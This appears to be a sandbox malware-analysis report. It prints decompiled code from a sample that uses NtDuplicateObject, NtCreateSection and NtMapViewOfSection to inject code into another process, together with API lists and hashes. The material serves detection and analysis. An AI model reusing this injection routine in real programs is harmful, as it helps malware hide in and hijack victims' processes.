Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401577() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t210;

				asm("repe push 0x387");
				_push(0x387);
				_t205 = _t204 + 4;
				_push(0x83);
				L004011F5(_t175, _t210);
				_t126 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L63;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t205;
				_push(0x83);
				L004011F5(_t176, _t231);
				return _t90;
			}

0x00401577
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00401523(void* __eax, void* __esi, void* __eflags) {
				long _t89;
				long _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				long _t100;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				long _t124;
				PVOID* _t125;
				long _t126;
				intOrPtr _t129;
				long* _t134;
				void* _t176;
				struct _EXCEPTION_RECORD _t177;
				struct _EXCEPTION_RECORD* _t187;
				intOrPtr* _t189;
				HANDLE* _t190;
				HANDLE* _t191;
				void* _t204;
				void* _t205;
				intOrPtr* _t207;

				asm("outsd");
				asm("out 0x70, al");
				if(__eflags > 0) {
					L004011F5(_t176, __eflags);
					_t129 =  *((intOrPtr*)(_t205 + 8));
					_t177 = 0;
					 *(_t205 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t4 = _t205 - 0x34;
						 *_t4 =  *(_t205 - 0x34) + 1;
						__eflags =  *_t4;
					}
					while(1) {
						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
						__eflags = _t89;
						if(_t89 != 0) {
							break;
						}
						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
					}
					 *(_t205 - 0x5c) = _t89;
					_t187 = _t205 - 0x60;
					 *_t187 = _t177;
					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
					_t92 =  *_t187;
					__eflags = _t92;
					if(__eflags != 0) {
						_t134 = _t205 - 0x30;
						 *_t134 = _t92;
						_t134[1] = _t177;
						_t189 = _t205 - 0x28;
						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
						 *_t189 = 0x18;
						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
							if(__eflags == 0) {
								 *(_t205 - 8) = _t177;
								_t99 = _t205 - 0x50;
								 *(_t99 + 4) = _t177;
								 *_t99 = 0x5000;
								_t190 = _t205 - 0x54;
								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
								__eflags = _t100;
								if(_t100 == 0) {
									 *_t26 =  *(_t205 - 0x50);
									_t123 = _t205 - 0x44;
									 *_t123 = _t177;
									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
									__eflags = _t124;
									if(_t124 == 0) {
										_t125 = _t205 - 0x3c;
										 *_t125 = _t177;
										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
										__eflags = _t126;
										if(_t126 == 0) {
											_t204 =  *(_t205 - 0x44);
											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
											_t38 = _t205 - 8;
											 *_t38 =  *(_t205 - 8) + 1;
											__eflags =  *_t38;
										}
									}
								}
								_t101 = _t205 - 0x50;
								 *(_t101 + 4) = _t177;
								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
								_t191 = _t205 - 0x58;
								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
								__eflags = _t102;
								if (_t102 != 0) goto L60;
								 *_t102 =  *_t102 + _t102;
								__eflags =  *_t102;
							}
						}
					}
					_push(0x15a4);
					_t93 =  *_t207;
					_push(0x83);
					L004011F5(_t177, __eflags);
					return _t93;
				} else {
					asm("popfd");
					asm("repe add al, 0x9b");
					asm("wait");
					asm("wait");
					return __esi;
				}
			}

0x00401523
0x00401524
0x00401527
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015af
0x004015b2
0x004015b4
0x004015b4
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015ba
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d1
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x00401600
0x00401602
0x0040161d
0x0040161f
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401644
0x00401647
0x00401649
0x0040164e
0x00401651
0x00401654
0x00401667
0x0040166a
0x0040166c
0x0040166e
0x00401671
0x00401685
0x00401688
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016c9
0x004016cb
0x004016cf
0x004016cf
0x004016cf
0x0040161f
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f
0x00401529
0x00401529
0x0040152a
0x0040152d
0x0040152e
0x0040152f
0x0040152f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040158C(void* __eax, void* __edi) {
				void* _t89;
				intOrPtr _t91;
				struct _EXCEPTION_RECORD _t94;
				intOrPtr _t95;
				struct _GUID _t101;
				struct _GUID _t103;
				long _t104;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t131;
				struct _EXCEPTION_RECORD* _t136;
				void* _t180;
				struct _EXCEPTION_RECORD _t181;
				struct _EXCEPTION_RECORD* _t189;
				intOrPtr* _t191;
				HANDLE* _t192;
				HANDLE* _t193;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				intOrPtr _t216;

				_t211 = _t210 + 1;
				asm("clc");
				asm("stc");
				_t89 = _t207;
				_t208 = __eax;
				_t180 = __edi - 1;
				_t2 = _t89 - 0x7d;
				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
				_t216 =  *_t2;
				_push(0x83);
				L004011F5(_t180, _t216);
				_t131 =  *((intOrPtr*)(__eax + 8));
				_t181 = 0;
				 *((intOrPtr*)(__eax - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
				}
				while(1) {
					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t91 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
				_t189 = _t208 - 0x60;
				 *_t189 = _t181;
				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
				_t94 =  *_t189;
				if(_t94 != 0) {
					_t136 = _t208 - 0x30;
					 *_t136 = _t94;
					 *(_t136 + 4) = _t181;
					_t191 = _t208 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
					 *_t191 = 0x18;
					_push(_t208 - 0x30);
					_push(_t191);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
						 *(_t208 - 8) = _t181;
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t181;
						 *_t101 = 0x5000;
						_t192 = _t208 - 0x54;
						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
							 *_t28 =  *(_t208 - 0x50);
							_t125 = _t208 - 0x44;
							 *_t125 = _t181;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
								_t127 = _t208 - 0x3c;
								 *_t127 = _t181;
								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
									_t206 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t103 = _t208 - 0x50;
						 *(_t103 + 4) = _t181;
						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t193 = _t208 - 0x58;
						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
						if (_t104 != 0) goto L60;
						 *_t104 =  *_t104 + _t104;
					}
				}
				_push(0x15a4);
				_t95 =  *_t211;
				_push(0x83);
				L004011F5(_t181, _t237);
				return _t95;
			}

0x0040158c
0x0040158d
0x0040158e
0x0040158f
0x0040158f
0x00401590
0x00401591
0x00401591
0x00401591
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401585() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t211;

				_push(0x387);
				_t206 = _t205 + 4;
				_push(0x83);
				L004011F5(_t175, _t211);
				_t126 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
				_t89 =  *_t185;
				if(_t89 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t96 = _t203 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t120 = _t203 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t203 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L64;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t206;
				_push(0x83);
				L004011F5(_t176, _t232);
				return _t90;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040159A() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t209;

				_push(0x83);
				L004011F5(_t175, _t209);
				_t127 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L61;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t204;
				_push(0x83);
				L004011F5(_t176, _t230);
				return _t90;
			}

0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.568876219.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

